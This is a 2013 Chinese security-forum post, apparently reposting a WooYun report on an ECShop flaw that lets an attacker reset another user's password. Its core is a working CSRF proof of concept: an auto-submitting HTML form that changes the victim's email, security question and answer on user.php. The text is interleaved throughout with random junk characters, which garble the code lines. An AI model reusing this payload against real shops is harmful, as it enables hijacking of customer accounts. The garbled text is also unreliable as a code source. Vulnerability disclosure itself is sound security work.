找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2400|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:% s. C; n+ R3 X/ c
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
( t3 A* T. q6 l3 G1 K" G" C$ `" H* E
Demo For:http://www.wooyun.org/bug.php?action=view&id=3950 x: Y5 q, m& l' \7 L

6 ?( G$ f; s' ~- O( P! j1 i详细说明:
# z. I1 [0 n' q2 @利用csrf和xss可以突破官方所说的“障碍”
( p: z' X$ Q. c  O5 Z" N0 Jxss版本已经有人说明7 D/ H  ^  `5 G. Y% V$ W) K. n
这里给出csrf版本
, [6 y1 j6 q6 |; o9 i
" }. b% L9 P4 d6 E4 k/ K6 ?漏洞证明:7 c2 Y  j0 r' _
<html>4 t5 M' }* F! ?. p) J. p; B% O
<body>
! t! o7 [  x3 j$ s; H$ S. u. E8 B+ M<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
+ q' V, d* }4 E+ Z) H! ]" ?<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">. G( f& m# H( a
<INPUT TYPE="text" NAME="act" value="act_edit_profile">* u4 c5 K1 S+ m1 `2 [6 w8 m3 I
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
# p: F" l, z8 I" c. v<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
: C% I5 T+ ?6 r% l1 n</body>
- ^3 d- D8 T, M5 \& t<script>: w7 \; s0 f6 j
document.forms[0].submit();" O8 e) j. W7 `& K- T9 U8 h
</script>$ U# w( ^4 A' ^
</html>  s' @: l- _' Y4 C9 f
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失3 ^; C# G7 d5 q- E
) E7 G3 N* i2 j. w! p  P/ W3 m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表